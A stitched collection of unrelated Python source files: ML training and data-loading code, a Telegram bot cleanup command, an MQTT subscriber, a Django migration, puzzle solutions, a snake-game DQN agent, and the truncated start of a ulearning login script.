np.maximum(maxima, pred, out=maxima)
argmaxima[maxima == pred] = i
return self.classes[np.array(argmaxima.T)]
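# --- Illustrative usage (appended sketch, not part of the original module) ---
# A minimal, hypothetical example of the one-against-rest wrapper above, using
# sklearn's LinearSVC (already imported here) as the per-class binary estimator
# and the iris dataset; any estimator exposing fit() and decision_function()
# can be plugged in the same way.
if __name__ == '__main__':
    iris = datasets.load_iris()
    sample_train, sample_test, label_train, label_test = train_test_split(
        iris.data, iris.target, test_size=0.3, random_state=0)
    one_against_rest = OneAgainstRest(LinearSVC)
    one_against_rest.train(sample_train, label_train)
    accuracy = one_against_rest.test(sample_test, label_test)
    print("accuracy: {}".format(accuracy))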
| 3,350 |
Yukki/Plugins/cleaners.py
|
vaibhav252/YukkiMusic-Old
| 13 |
2172151
|
import os
import shutil
from Yukki import OWNER
from pyrogram.types import Message
from pyrogram import filters, Client
from ..YukkiUtilities.helpers.filters import command
@Client.on_message(command("clean") & filters.user(OWNER))
async def clear_storage(_, message: Message):
dir_1 = 'downloads'
dir_2 = 'search'
shutil.rmtree(dir_1)
shutil.rmtree(dir_2)
os.mkdir(dir_1)
os.mkdir(dir_2)
await message.reply_text("✅ Cleaned all **temp** dir(s) !")
| 491 |
script_tensorflow/classification.py
|
curto2/graphics
| 5 |
2170483
|
# Original python notebook from Fridman <<EMAIL>>.
# Slightly modified by <NAME> Zarza.
# <EMAIL> <EMAIL>
#!/usr/bin/python2
import sys, os, time
import itertools
import math, random
import glob
import tensorflow as tw
import numpy as np
import cv2
from sklearn.metrics import confusion_matrix
import matplotlib.pyplot as plt
import warnings
warnings.filterwarnings('ignore')
# Basic parameters
m_epochs = 22
path_class = "gender/" # Adapt for specific class, generate folder with subfolders for each attribute
attributes = ["male","female"] # Add specific attributes
sample_x = 32
sample_y = 32
train_test_split_ratio = 0.9
batch_size = 32
checkpoint_name = "output/c-and-z.ckpt"
# Helper layer functions
def weight_variable(shape):
initial = tw.truncated_normal(shape, stddev=0.1)
return tw.Variable(initial)
def bias_variable(shape):
initial = tw.constant(0.1, shape=shape)
return tw.Variable(initial)
def ctn2d(x, W, stride):
return tw.nn.conv2d(x, W, strides=[1, stride, stride, 1], padding='SAME')
def m_pool_2x2(x):
return tw.nn.max_pool(x, ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1], padding='SAME')
# Model
x = tw.placeholder(tw.float32, shape=[None, sample_x, sample_y, 3])
y_ = tw.placeholder(tw.float32, shape=[None, len(attributes)])
x_2 = x
# Our first six convolutional layers of 16 3x3 filters
W_ctn1 = weight_variable([3, 3, 3, 16])
b_ctn1 = bias_variable([16])
h_ctn1 = tw.nn.relu(ctn2d(x_2, W_ctn1, 1) + b_ctn1)
W_ctn2 = weight_variable([3, 3, 16, 16])
b_ctn2 = bias_variable([16])
h_ctn2 = tw.nn.relu(ctn2d(h_ctn1, W_ctn2, 1) + b_ctn2)
W_ctn3 = weight_variable([3, 3, 16, 16])
b_ctn3 = bias_variable([16])
h_ctn3 = tw.nn.relu(ctn2d(h_ctn2, W_ctn3, 1) + b_ctn3)
W_ctn4 = weight_variable([3, 3, 16, 16])
b_ctn4 = bias_variable([16])
h_ctn4 = tw.nn.relu(ctn2d(h_ctn3, W_ctn4, 1) + b_ctn4)
W_ctn5 = weight_variable([3, 3, 16, 16])
b_ctn5 = bias_variable([16])
h_ctn5 = tw.nn.relu(ctn2d(h_ctn4, W_ctn5, 1) + b_ctn5)
W_ctn6 = weight_variable([3, 3, 16, 16])
b_ctn6 = bias_variable([16])
h_ctn6 = tw.nn.relu(ctn2d(h_ctn5, W_ctn6, 1) + b_ctn6)
# Our pooling layer
h_pool4 = m_pool_2x2(h_ctn6)
n1, n2, n3, n4 = h_pool4.get_shape().as_list()
W_fc1 = weight_variable([n2*n3*n4, 2])
b_fc1 = bias_variable([2])
# We flatten our pool layer into a fully connected layer
h_pool4_flat = tw.reshape(h_pool4, [-1, n2*n3*n4])
y = tw.matmul(h_pool4_flat, W_fc1) + b_fc1
sn = tw.InteractiveSession()
# Our loss function and optimizer
loss = tw.reduce_mean(tw.nn.softmax_cross_entropy_with_logits(labels = y_, logits = y))
train_step = tw.train.AdamOptimizer(1e-4).minimize(loss)
sn.run(tw.initialize_all_variables())
saver = tw.train.Saver()
time_start = time.time()
v_loss = least_loss = 99999999
# Load data
full_set = []
for abts in attributes:
for ex in glob.glob(os.path.join(path_class, abts, "*")):
sample = cv2.imread(ex)
if not sample is None:
sample = cv2.resize(sample, (32, 32))
# Create an array representing our classes and set it
one_hot_array = [0] * len(attributes)
one_hot_array[attributes.index(abts)] = 1
assert(sample.shape == (32, 32, 3))
full_set.append((sample, one_hot_array, ex))
random.shuffle(full_set)
# We split our data into a training and test set here
split_index = int(math.floor(len(full_set) * train_test_split_ratio))
train_set = full_set[:split_index]
test_set = full_set[split_index:]
# We ensure that our training and test sets are a multiple of batch size
train_set_offset = len(train_set) % batch_size
test_set_offset = len(test_set) % batch_size
train_set = train_set[: len(train_set) - train_set_offset]
test_set = test_set[: len(test_set) - test_set_offset]
train_x, train_y, train_z = zip(*train_set)
test_x, test_y, test_z = zip(*test_set)
print("Starting training... [{} training examples]".format(len(train_x)))
v_loss = 9999999
train_loss = []
vn_loss = []
for z in range(0, m_epochs):
# Iterate over our training set
for tt in range(0, (len(train_x) // batch_size)):
start_batch = batch_size * tt
end_batch = batch_size * (tt + 1)
train_step.run(feed_dict={x: train_x[start_batch:end_batch], y_: train_y[start_batch:end_batch]})
seen = "Current epoch, examples seen: {:20} / {} \r".format(tt * batch_size, len(train_x))
sys.stdout.write(seen.format(tt * batch_size))
sys.stdout.flush()
seen = "Current epoch, examples seen: {:20} / {} \r".format((tt + 1) * batch_size, len(train_x))
sys.stdout.write(seen.format(tt * batch_size))
sys.stdout.flush()
t_loss = loss.eval(feed_dict={x: train_x, y_: train_y})
v_loss = loss.eval(feed_dict={x: test_x, y_: test_y})
train_loss.append(t_loss)
vn_loss.append(v_loss)
sys.stdout.write("Epoch {:5}: loss: {:15.10f}, validation loss: {:15.10f}".format(z + 1, t_loss, v_loss))
if v_loss < least_loss:
sys.stdout.write(", saving new best model to {}".format(checkpoint_name))
least_loss = v_loss
filename = saver.save(sn, checkpoint_name)
sys.stdout.write("\n")
plt.figure()
plt.xticks(np.arange(0, len(train_loss), 1.0))
plt.ylabel("Loss")
plt.xlabel("Epochs")
train_line = plt.plot(range(0, len(train_loss)), train_loss, 'r', label="Train loss")
vn_line = plt.plot(range(0, len(vn_loss)), vn_loss, 'g', label="Validation loss")
plt.legend()
plt.show()
zipped_x_y = list(zip(test_x, test_y))
cfn_true = []
cfn_ptd = []
for tt in range(0, len(zipped_x_y)):
q = zipped_x_y[tt]
sfmax = list(sn.run(tw.nn.softmax(y.eval(feed_dict={x: [q[0]]})))[0])
sf_idx = sfmax.index(max(sfmax))
predicted_label = attributes[sf_idx]
actual_label = attributes[q[1].index(max(q[1]))]
cfn_true.append(actual_label)
cfn_ptd.append(predicted_label)
if predicted_label != actual_label:
print("Actual: {}, predicted: {}".format(actual_label, predicted_label))
path_sample = test_z[tt]
epl_sample = cv2.imread(filename=path_sample)
# From sklearn docs
def plot_confusion_matrix(cm, classes,
normalize=False,
title='Confusion matrix',
cmap=plt.cm.Blues):
"""
This function prints and plots the confusion matrix.
Normalization can be applied by setting `normalize=True`.
"""
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(classes))
plt.xticks(tick_marks, classes, rotation=45)
plt.yticks(tick_marks, classes)
cm2 = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
cm2 = np.around(cm2, 2)
threshd = cm.max() / 2.
for c, z in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
plt.text(z, c, str(cm[c, z]) + " / " + str(cm2[c, z]),
horizontalalignment="center",
color="white" if cm[c, z] > threshd else "black")
plt.tight_layout()
plt.ylabel('True label')
plt.xlabel('Predicted label')
cnf_matrix = confusion_matrix(cfn_true, cfn_ptd)
plt.figure()
plot_confusion_matrix(cnf_matrix, classes=attributes, normalize=False,
title='Normalized confusion matrix')
plt.show()
| 7,307 |
WinIO/WinIO/Scripts/WinIO2/Config/Application.py
|
sak9188/WinIO2
| 1 |
2173164
|
# -*- coding: UTF-8 -*-
from WinIO2.Config.Configure import ConfigureMeta, StringType
from collections import OrderedDict
# Configuration for the application
class ApplicationString:
OutputFont = "OutputDefaultFontFamily"
OutputFontSize = "OutputDefaultFontSize"
BackgroundImage = "BackgroundImage"
class ApplicationCofigure(object):
ConfigDict = OrderedDict([
        (ApplicationString.OutputFont, ("Output panel font", None)),
        (ApplicationString.OutputFontSize, ("Output panel font size", None)),
        (ApplicationString.BackgroundImage, ("Window desktop background", "", StringType.Dialog))
])
Discribers = OrderedDict()
__metaclass__ = ConfigureMeta
| 595 |
day 15/Toon D - Python/day15.py
|
AE-nv/aedvent-code-2021
| 1 |
2170868
|
from queue import PriorityQueue
lines = open("day 15/Toon D - Python/input", "r").readlines()
grid = [[int(x) for x in line.replace('\n','')] for line in lines]
def is_in_field_1(x,y):
return x >= 0 and \
x < len(grid) and \
y >= 0 and \
y < len(grid[0])
def is_in_field_2(x,y):
return x >= 0 and \
x < len(grid) * 5 and \
y >= 0 and \
y < len(grid[0]) * 5
def get_value_1(x,y):
return grid[x][y]
def get_value_2(x,y):
diff_x, original_x = divmod(x, len(grid))
diff_y, original_y = divmod(y, len(grid))
distance = (grid[original_x][original_y] + diff_x + diff_y)
if distance > 9:
return 1 + distance % 10
else:
return distance
def dijkstra(len_x, len_y, get_distance, is_in_field):
shortest_paths = {str([x,y]): 999999999 for x in range(len_x) for y in range(len_y)}
visited = set()
queue = PriorityQueue()
queue.put((0, [0,0]))
while not queue.empty():
(distance, (a,b)) = queue.get()
for (da,db) in [(0,-1),(0,1),(-1,0),(1,0)]:
x = a + da
y = b + db
next_key = str([x,y])
if is_in_field(x,y):
if next_key in visited:
continue
d = distance + get_distance(x,y)
previous_d = shortest_paths[next_key]
if d < previous_d:
shortest_paths[next_key] = d
queue.put((d,[x,y]))
return shortest_paths
len_x_1 = len(grid)
len_y_1 = len(grid[0])
print('part 1: %i' % dijkstra(len_x_1, len_y_1, get_value_1, is_in_field_1)[str([len_x_1-1,len_y_1-1])])
len_x_2 = len_x_1*5
len_y_2 = len_y_1*5
print('part 2: %i' % dijkstra(len_x_2, len_y_2, get_value_2, is_in_field_2)[str([len_x_2-1,len_y_2-1])])
| 1,664 |
MixMatch-pytorch/dataset/svhn.py
|
cleverhans-lab/model-extraction-iclr
| 0 |
2171741
|
import numpy as np
from PIL import Image
import torchvision
import torch
class TransformTwice:
def __init__(self, transform):
self.transform = transform
def __call__(self, inp):
out1 = self.transform(inp)
out2 = self.transform(inp)
return out1, out2
def get_svhn(root, n_labeled,
transform_train=None, transform_val=None,
download=True):
base_dataset = torchvision.datasets.SVHN(root, split='train', download=download)
test_dataset = torchvision.datasets.SVHN(root, split='test', download=download)
train_labeled_idxs, train_unlabeled_idxs, val_idxs = train_val_split(test_dataset.labels, int(n_labeled/10))
train_labeled_idxs2, train_unlabeled_idxs2, val_idxs2 = train_val_split(
base_dataset.labels, int(n_labeled / 10), False)
train_labeled_dataset = SVHN_labeledmod(root, train_labeled_idxs, train=False, transform=transform_train)
train_unlabeled_dataset = SVHN_unlabeled(root, train_unlabeled_idxs, train=False, transform=TransformTwice(transform_train))
val_dataset = SVHN_labeled(root, val_idxs2, train=True, transform=transform_val, download=True)
test_dataset = SVHN_labeled(root, train=False, transform=transform_val, download=True)
#print("Test shape", train_labeled_dataset[0][0].shape)
print (f"#Labeled: {len(train_labeled_idxs)} #Unlabeled: {len(train_unlabeled_idxs)} #Val: {len(val_idxs)}")
return train_labeled_dataset, train_unlabeled_dataset, val_dataset, test_dataset, val_idxs
def train_val_split(labels, n_labeled_per_class, write=True):
labels = np.array(labels)
train_labeled_idxs = []
train_unlabeled_idxs = []
val_idxs = []
ent = 0
gap = 0
temp1 = np.load("svhnent.npy")
temp2 = np.load("svhngap.npy")
#pknn = 0
total = n_labeled_per_class*10
# To get an equal number of samples per class.
# for i in range(10):
# idxs = np.where(labels == i)[0]
# np.random.shuffle(idxs)
# train_labeled_idxs.extend(idxs[:n_labeled_per_class])
# train_unlabeled_idxs.extend(idxs[n_labeled_per_class:-500])
# val_idxs.extend(idxs[-500:])
# Random selection for point:
n_labeled = n_labeled_per_class * 10
idxs = np.where(labels < 10)[0] # All points
np.random.shuffle(idxs)
train_labeled_idxs.extend(idxs[:n_labeled])
train_unlabeled_idxs.extend(idxs[n_labeled: -1000]) # was 500
val_idxs.extend(idxs[-1000:])
if write == True:
for i in train_labeled_idxs:
ent += temp1[i]
gap += temp2[i]
file = f"svhn@{total}new/stats.txt"
f = open(file, "w")
f.write("Entropy: " + str(ent) + "\n")
f.write("Gap: " + str(gap) + "\n")
f.close()
np.random.shuffle(train_labeled_idxs)
np.random.shuffle(train_unlabeled_idxs)
np.random.shuffle(val_idxs)
return train_labeled_idxs, train_unlabeled_idxs, val_idxs
svhn_mean = (0.430, 0.428, 0.443) # equals np.mean(train_set.train_data, axis=(0,1,2))/255
svhn_std = (0.196, 0.198, 0.199) # equals np.std(train_set.train_data, axis=(0,1,2))/255
def normalise(x, mean=svhn_mean, std=svhn_std):
x, mean, std = [np.array(a, np.float32) for a in (x, mean, std)]
x = np.moveaxis(x, 1, 3)
#print("X", x.shape)
#print("mean", mean.shape)
x -= mean*255
x *= 1.0/(255*std)
return x
def transpose(x, source='NHWC', target='NCHW'):
return x.transpose([source.index(d) for d in target])
def pad(x, border=4):
return np.pad(x, [(0, 0), (border, border), (border, border)], mode='reflect')
class RandomPadandCrop(object):
"""Crop randomly the image.
Args:
output_size (tuple or int): Desired output size. If int, square crop
is made.
"""
def __init__(self, output_size):
assert isinstance(output_size, (int, tuple))
if isinstance(output_size, int):
self.output_size = (output_size, output_size)
else:
assert len(output_size) == 2
self.output_size = output_size
def __call__(self, x):
x = pad(x, 4)
h, w = x.shape[1:]
new_h, new_w = self.output_size
top = np.random.randint(0, h - new_h)
left = np.random.randint(0, w - new_w)
x = x[:, top: top + new_h, left: left + new_w]
return x
class RandomFlip(object):
"""Flip randomly the image.
"""
def __call__(self, x):
if np.random.rand() < 0.5:
x = x[:, :, ::-1]
return x.copy()
class GaussianNoise(object):
"""Add gaussian noise to the image.
"""
def __call__(self, x):
c, h, w = x.shape
x += np.random.randn(c, h, w) * 0.15
return x
class ToTensor(object):
"""Transform the image to tensor.
"""
def __call__(self, x):
x = torch.from_numpy(x)
return x
class SVHN_labeled(torchvision.datasets.SVHN):
def __init__(self, root, indexs=None, train=True,
transform=None, target_transform=None,
download=False):
super(SVHN_labeled, self).__init__(root, split='train' if train == True else 'test',
transform=transform, target_transform=target_transform,
download=download)
if indexs is not None:
self.data = self.data[indexs]
self.labels = np.array(self.labels)[indexs]
self.data = transpose(normalise(self.data))
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is index of the target class.
"""
img, target = self.data[index], self.labels[index]
#print(img.shape)
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target
class SVHN_unlabeled(SVHN_labeled):
def __init__(self, root, indexs, train=True,
transform=None, target_transform=None,
download=False):
super(SVHN_unlabeled, self).__init__(root, indexs, train=train,
transform=transform, target_transform=target_transform,
download=download)
self.labels = np.array([-1 for i in range(len(self.labels))])
class SVHN_labeledmod(torchvision.datasets.SVHN):
def __init__(self, root, indexs=None, train=True,
transform=None, target_transform=None,
download=False):
super(SVHN_labeledmod, self).__init__(root, split='train' if train == True else 'test',
transform=transform, target_transform=target_transform,
download=download)
# print(type(self.data))
# print(self.data.shape)
# print(type(self.data[0]))
# print(self.data[0].shape)
if indexs is not None:
self.data = self.data[indexs]
#victim = load_private_model_by_id()
# temp = []
# for i in indexs:
#self.targets = victim(self.data)
# Use model predictions here?
targets = np.load("svhntargets.npy")
self.targets = np.array(targets)[indexs]
#print(self.targets)
self.data = transpose(normalise(self.data))
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is index of the target class.
"""
img, target = self.data[index], self.targets[index]
#print(img.shape)
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target
| 7,869 |
utils/segk/utils.py
|
celi52/caskernel
| 1 |
2172372
|
import csv
import numpy as np
def read_edgelist(path, delimiter, nodetype=str, cols=2):
edges = list()
with open(path, encoding='utf8') as f:
for line in f:
t = line.split(delimiter)
if cols == 2:
edges.append((nodetype(t[0]),nodetype(t[1][:-1])))
elif cols > 2:
edges.append((nodetype(t[0]),nodetype(t[1])))
nodes = set()
for e in edges:
if e[0] not in nodes:
nodes.add(e[0])
if e[1] not in nodes:
nodes.add(e[1])
nodes = list(nodes)
return nodes, edges
def write_to_file(path, nodes, embeddings, delimiter=' '):
with open(path, 'w') as f:
writer = csv.writer(f, delimiter=delimiter)
for i,node in enumerate(nodes):
lst = [node]
lst.extend(embeddings[i,:].tolist())
writer.writerow(lst)
def extract_egonets(edgelist, radius, node_labels=None):
nodes = list()
neighbors = dict()
for e in edgelist:
if e[0] not in neighbors:
neighbors[e[0]] = [e[1]]
nodes.append(e[0])
else:
neighbors[e[0]].append(e[1])
if e[1] not in neighbors:
neighbors[e[1]] = [e[0]]
nodes.append(e[1])
else:
neighbors[e[1]].append(e[0])
egonet_edges = dict()
egonet_node_labels = dict()
for node in nodes:
egonet_edges[node] = set()
egonet_node_labels[node] = {node: 0}
for i in range(1, radius+1):
for node in nodes:
leaves = [v for v in egonet_node_labels[node] if egonet_node_labels[node][v]==(i-1)]
for leaf in leaves:
for v in neighbors[leaf]:
if v not in egonet_node_labels[node]:
egonet_node_labels[node][v] = i
egonet_edges[node].add((v,leaf))
for v2 in neighbors[v]:
if v2 in egonet_node_labels[node]:
egonet_edges[node].add((v,v2))
return egonet_edges, egonet_node_labels
def load_graph_classification_data(ds_name, use_node_labels):
nodes = list()
edges = list()
graph_indicator = dict()
node_labels = None
with open("datasets/graph_classification/%s/%s_graph_indicator.txt"%(ds_name,ds_name), "r") as f:
c = 1
for line in f:
graph_indicator[c] = int(line[:-1])
nodes.append(c)
c += 1
with open("datasets/graph_classification/%s/%s_A.txt"%(ds_name,ds_name), "r") as f:
for line in f:
edge = line[:-1].split(",")
edge[1] = edge[1].replace(" ", "")
edges.append((int(edge[0]), int(edge[1])))
if use_node_labels:
node_labels = dict()
with open("datasets/graph_classification/%s/%s_node_labels.txt"%(ds_name,ds_name), "r") as f:
c = 1
for line in f:
node_labels[c] = int(line[:-1])
c += 1
class_labels = list()
with open("datasets/graph_classification/%s/%s_graph_labels.txt"%(ds_name,ds_name), "r") as f:
for line in f:
class_labels.append(int(line[:-1]))
class_labels = np.array(class_labels, dtype=np.float32)
return nodes, edges, graph_indicator, node_labels, class_labels
def pyramid_match_kernel(Us, d=20, L=4):
N = len(Us)
Hs = {}
for i in range(N):
n = Us[i].shape[0]
Hs[i] = []
for j in range(L):
l = 2**j
D = np.zeros((d, l))
T = np.floor(Us[i]*l)
T[np.where(T==l)] = l-1
for p in range(Us[i].shape[0]):
if p >= n:
continue
for q in range(Us[i].shape[1]):
D[q,int(T[p,q])] = D[q,int(T[p,q])] + 1
Hs[i].append(D)
K = np.zeros((N,N))
for i in range(N):
for j in range(i,N):
k = 0
intersec = np.zeros(L)
for p in range(L):
intersec[p] = np.sum(np.minimum(Hs[i][p], Hs[j][p]))
k = k + intersec[L-1]
for p in range(L-1):
k = k + (1.0/(2**(L-p-1)))*(intersec[p]-intersec[p+1])
K[i,j] = k
K[j,i] = K[i,j]
return K
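# --- Illustrative usage (appended sketch, not part of the original module) ---
# A self-contained toy example of extract_egonets() on the path graph
# 1-2-3-4: with radius 2, node '1' sees '2' at distance 1 and '3' at
# distance 2, and the returned edge sets cover the edges inside each egonet.
if __name__ == '__main__':
    toy_edges = [('1', '2'), ('2', '3'), ('3', '4')]
    ego_edges, ego_labels = extract_egonets(toy_edges, radius=2)
    print(ego_labels['1'])  # {'1': 0, '2': 1, '3': 2}
    print(ego_edges['1'])   # edges inside the 2-hop egonet of node '1'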
| 4,350 |
test/usermodule.py
|
by-student-2017/skpar-0.2.4_Ubuntu18.04LTS
| 9 |
2172269
|
"""Trivial user module."""
def userfunc(say='Hi'):
"""Test func with one parameter."""
return 'SKPAR says {}'.format(say)
TASKDICT = {'greet': userfunc}
| 163 |
agent/dqn/submission.py
|
youkeyao/SJTU-CS410-Snakes-3V3-Group06
| 1 |
2171737
|
import os
import numpy as np
import torch
from torch import nn
import torch.nn.functional as F
DEVICE = torch.device("cpu")
ENOUGH_LEN = 25
class Action:
top = [1, 0, 0, 0]
bottom = [0, 1, 0, 0]
left = [0, 0, 1, 0]
right = [0, 0, 0, 1]
actlist = [(-1, 0), (1, 0), (0, -1), (0, 1)]
mapAct = {
0: top,
1: bottom,
2: left,
3: right
}
class Net(nn.Module):
def __init__(self, obs_dim, act_dim):
super(Net, self).__init__()
self.conv1 = nn.Sequential(
nn.Conv2d(in_channels=obs_dim, out_channels=16, kernel_size=5, stride=1, padding=2),
nn.ReLU(),
)
self.conv2 = nn.Sequential(
nn.Conv2d(16, 16, 5, 1, 2),
nn.ReLU(),
)
self.fc1 = nn.Linear(6400, 32)
self.fc1.weight.data.normal_(0, 0.1)
self.outA = nn.Linear(32, act_dim)
self.outA.weight.data.normal_(0, 0.1)
self.outV = nn.Linear(32, 1)
self.outV.weight.data.normal_(0, 0.1)
def forward(self, x):
x = self.conv1(x)
x = self.conv2(x)
x = x.view(x.size(0), -1)
x = self.fc1(x)
x = F.relu(x)
advantage = self.outA(x)
value = self.outV(x)
Q = value + advantage - advantage.mean(-1).view(-1,1)
return Q
class Agent(object):
def __init__(self, obs_dim, act_dim):
self.obs_dim = obs_dim
self.act_dim = act_dim
self.eval_net = Net(obs_dim, act_dim)
def choose_action(self, x):
x = torch.FloatTensor(x)
actions_value = self.eval_net.forward(x)
action = torch.max(actions_value, 1)[1].data.numpy()
return action
def load_model(self, path):
eval = torch.load(path)
self.eval_net.load_state_dict(eval)
def get_observations(state, agents_index, height, width):
observations = []
for i in agents_index:
sample = []
head = state[i+2][0]
sample.append(getArea(state[i+2], height, width, head, True))
other_snake = np.zeros((width, width))
for j in range(2, 8):
other_snake += getArea(state[j], height, width, head, True)
sample.append(other_snake)
sample.append(getArea(state[1], height, width, head, False))
observations.append(sample)
return np.array(observations)
def countPos(head, p, width, height):
tmp = [0, 0]
tmp[0] = int(p[0] - head[0] + height - 1) % height
tmp[1] = int(p[1] - head[1] + width * 3 / 2) % width
return tmp
def getArea(state, height, width, head, isSnake):
areas = np.zeros((height, width))
for j in range(len(state)):
p = tuple(countPos(head, state[j], width, height))
if isSnake and j == 0:
areas[p] = 10
areas[((p[0] + 1) % height, p[1])] = 1
areas[((p[0] + height - 1) % height, p[1])] = 1
areas[(p[0], (p[1] + 1) % width)] = 1
areas[(p[0], (p[1] + width - 1) % width)] = 1
else:
areas[p] = 5
return np.concatenate((areas, areas))
def can_follow_tail(obs):
length = len(obs[obs['controlled_snake_index']])
head = tuple(obs[obs['controlled_snake_index']][0])
tail = tuple(obs[obs['controlled_snake_index']][length - 1])
act = ((tail[0] - head[0] + obs['board_height'] % obs['board_height'], tail[1] - head[1] + obs['board_width'] % obs['board_width']))
if length >= ENOUGH_LEN and act in Action.actlist:
return (True, Action.actlist.index(act))
else:
return (False,)
def my_controller(observation, action_space, is_act_continuous=False):
follow_tail = can_follow_tail(observation)
if follow_tail[0]:
action = follow_tail[1]
return [Action.mapAct[action]]
board_width = observation['board_width']
board_height = observation['board_height']
o_index = observation['controlled_snake_index'] # 2, 3, 4, 5, 6, 7 -> indexs = [0,1,2,3,4,5]
o_indexs_min = 3 if o_index > 4 else 0
indexs = [o_indexs_min, o_indexs_min+1, o_indexs_min+2]
obs = get_observations(observation, indexs, board_height, board_width)
# agent
agent = Agent(3, 4)
eval = os.path.dirname(os.path.abspath(__file__)) + "/trained_model/eval_3000.pth"
agent.load_model(eval)
action = agent.choose_action(obs)[o_index-o_indexs_min-2]
return [Action.mapAct[action]]
| 4,395 |
JQTT/sub.py
|
Jaimeloeuf/JQTT
| 1 |
2171265
|
""" Dependencies """
import paho.mqtt.subscribe as subscribe
# Using the thread class to use threads and prevent the subscribe call from blocking.
from threading import Thread
# Client class
import paho.mqtt.client as mqtt
# Global variable to store the broker address, default broker is here too
broker = "m2m.eclipse.org"
# Global variable to store the topic name, default topic is here too
topic = ""
# Global variable to store the transaction QoS, default value here.
qos = 1
def set_broker(data):
    # Function exposed to other modules to set the broker address to connect to.
global broker
broker = data
def set_topic(data=None):
    # Function exposed to other modules to set the topic to subscribe to.
global topic
topic = data
def set_qos(data=None):
    # Function exposed to other modules to set the QoS level for transactions.
global qos
qos = data
# Default callback function for subscriptions to use if none given during subscription
def new_Msg(client, userdata, message):
""" Arguements passed in by the subscription service:
client: The MQTT client object
user_data: User data that was included in the message payload
message: The message that was received
"""
# print("%s : %s" % (message.topic, message.payload))
print(client)
print(userdata)
print(str(message.payload)) # Just print out the message body
subscriptions = []
def sub(cb=new_Msg):
# Create a new client
client = mqtt.Client()
# Append the subscription to the array to allow more than one subscription.
# subscriptions.append(client)
# Add event handler / callback function when there is a new incoming message.
client.on_message = cb
# Establish a connection with the broker using the default port. Note that this call is blocking
client.connect(broker, port=1883)
# After a successful connection, establish a subscription pipe with the broker to the specified topic
# Qos is currently 1, will create another function to allow overiding this.
client.subscribe(topic, qos=1)
# Put the blocking subscribe action into a daemonic thread based loop and return control to the main thread.
client.loop_start()
subscriptions.append(client)
# Debug statement.
print("Subscribed to topic: ", topic)
if __name__ == "__main__":
# If module called as standalone module, run the example code below to demonstrate this MQTT client lib
from time import sleep
# Threading library used to wait for daemons
from Jevents import wait_for_daemons
# Set topic for subscription
set_topic('IOTP/grp4/channel/')
# Subscribe to the above topic
sub()
""" Inner functions like this can also be used as the callback function for a subscription.
Note that if you are defining your own callback functions, make sure it accepts the same input parameters
as the parameters shown in the example and default subscription on_message callback function, 'new_Msg' """
def new_Msg2(client, userdata, message):
print('This is the new handler, msg is: ', message.payload.decode()) # Decode the bytes array to UTF8
# Set new topic for subscription
set_topic('IOTP/grp4/channel/hellow')
    # Subscribe to the newly set topic
sub(new_Msg2)
""" Blocking call on the main thread to prevent it from ending when there are still Daemonic
threads running in the background such as the subscription services which are daemons. """
# wait_for_daemons()
""" Below is an alternative to using wait_for_daemons by keeping the main thread busy with an
infinite loop printing out stuff to simulate other actions that can happen in the main thread """
try:
while True:
# Print something to emulate the main thread doing something.
print('chicken')
sleep(0.8) # Blocking wait call.
except KeyboardInterrupt:
for sub in subscriptions:
sub.disconnect()
| 4,024 |
p0sx/pos/migrations/0013_auto_20210823_0345.py
|
bluesnail95m/nuxis
| 3 |
2173074
|
# Generated by Django 3.2.6 on 2021-08-23 03:45
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('pos', '0012_sumupapikey_sumupterminal_sumuptransaction'),
]
operations = [
migrations.AlterField(
model_name='creditupdate',
name='updated_by_user',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='updated_by_user', to='pos.user'),
),
migrations.CreateModel(
name='SumUpCard',
fields=[
('id', models.UUIDField(default=uuid.uuid4, primary_key=True, serialize=False, unique=True)),
('amount', models.DecimalField(decimal_places=2, max_digits=9)),
('status', models.SmallIntegerField(choices=[(0, 'CREATED'), (1, 'PROCESSING'), (2, 'SUCCESS'), (3, 'FAILED'), (4, 'COMPLETE')], default=0)),
('transaction_id', models.CharField(blank=True, max_length=64, null=True)),
('transaction_comment', models.CharField(blank=True, max_length=256, null=True)),
('created', models.DateTimeField(auto_now_add=True)),
('timestamp', models.DateTimeField(auto_now=True)),
('authorized_user', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to=settings.AUTH_USER_MODEL)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='pos.user')),
],
),
]
| 1,688 |
杂项/HeinrichMarxCup2020/ulearning.py
|
FengGuanxi/HDU-Experience
| 556 |
2172986
|
# -*-coding:utf-8-*-
# author: zh-spike
from typing import Pattern
import requests
import json
import re
import getpass
from bs4 import BeautifulSoup
import csv
headers = {
'User-Agent' : 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0',
'Content-Type': 'application/x-www-form-urlencoded',
'Connection' : 'Keep-Alive',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
# Define the required URLs
login_url = "https://www.ulearning.cn/umooc/user/login.do"  # login
info_url = "https://api.ulearning.cn/user"  # endpoint for fetching user info
# Start a session used for the login interaction
session = requests.Session()
# Stores the information of a single chapter
chapter = {"title": None, "id": None, "sections": []}
# token
token = ""
# Login function
def login():
auth = {}
auth["name"] = input("[*] 用户名:")
auth["passwd"] = getpass.getpass("[*] 密码(输入时不可见):")
session.post(login_url, auth)
if "token" in session.cookies.keys():
global token
token = session.cookies["token"]
print("[+] 登录成功")
return True
else:
print("[-] 登录失败")
# Print the user's information
def print_user_info():
    res = session.get(info_url, headers={"UA-AUTHORIZATION": token})
    info = res.text.strip()
    info = json.loads(info)
    print("[*] User ID: " + str(info["userid"]))
    print("[*] User name: " + info["name"])
# Start
def work():
i = 0
uri_header="https://www.ulearning.cn/umooc/user/study.do?operation=examReport&examid=33716&examuserid=7853135"
with open('data.csv','w',encoding='utf-8') as f:
while i < 127:
